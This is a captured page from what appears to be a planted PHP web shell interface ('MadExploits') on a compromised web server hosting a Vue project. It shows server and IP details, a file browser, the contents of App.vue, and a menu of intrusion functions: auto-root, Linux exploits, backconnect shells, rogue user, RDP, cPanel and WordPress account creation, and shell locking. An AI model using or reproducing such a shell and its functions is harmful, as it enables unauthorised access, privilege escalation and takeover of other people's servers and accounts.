Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.145
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
staging.arcusdesignz.com /
arcus /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
router
[ DIR ]
drwxr-xr-x
store
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
App.vue
2.4
KB
-rw-r--r--
main.js
223
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : App.vue
<template> <div id="app"> <NavBar /> <router-view></router-view> </div> </template> <script> import NavBar from './components/NavBar.vue' export default { name: 'App', components: { NavBar } } </script> <style lang="scss"> #app { margin: 0 auto; background-color: #F5F5F5 !important; } html, body { scroll-behavior: smooth; } body { overflow: overlay; } /* WebKit (Chrome, Safari) */ ::-webkit-scrollbar { width: 8px; background-color: transparent; } ::-webkit-scrollbar-thumb { background-color: #b2b2b2; border-radius: 4px; } /* Firefox */ * { scrollbar-width: thin; scrollbar-color: #EC2326 transparent; } *::-webkit-scrollbar { display: none; background-color: transparent; } body { margin: 0; font: 1rem Montserrat; } .svg-fill { fill: #b2b2b2; } .link-color { >* { transition: 0.2s color, 0.2s fill, 0.2s transform; } &:hover { cursor: pointer; p { color: #ec2326 !important; } svg { transform: translateX(10px); .svg-fill { fill: #ec2326; } } } } .explore-animate { >* { transition: 0.2s color, 0.2s fill, 0.2s transform; } &:hover { cursor: pointer; img { transform: translateX(10px) !important; } } } .button-position { >* { transition: 0.2s color, 0.2s fill, 0.2s transform; } &:hover { cursor: pointer; button { color: #ec2326; } svg { transform: translateX(10px); .svg-fill { fill: #ec2326; } } } } .touch-animate { >* { transition: 0.2s color, 0.2s fill, 0.2s transform; } &:hover { cursor: pointer; h2 { color: #ec2326 !important; } svg { transform: translateX(10px); .svg-fill { fill: #ec2326; } } } } html, body { overscroll-behavior: none; } html { transition: 0.5s all; } @media (min-width: 992px) { html { font-size: 10px !important; } } @media (min-width: 1100px) { html { font-size: 11px !important; } } @media (min-width: 1200px) { html { font-size: 12px !important; } } @media (min-width: 1300px) { html { font-size: 13px !important; } } @media (min-width: 1400px) { html { font-size: 14px !important; } } @media (min-width: 1500px) { html { font-size: 15px !important; } } @media (min-width: 1600px) { html { font-size: 1rem !important; } } </style>
Close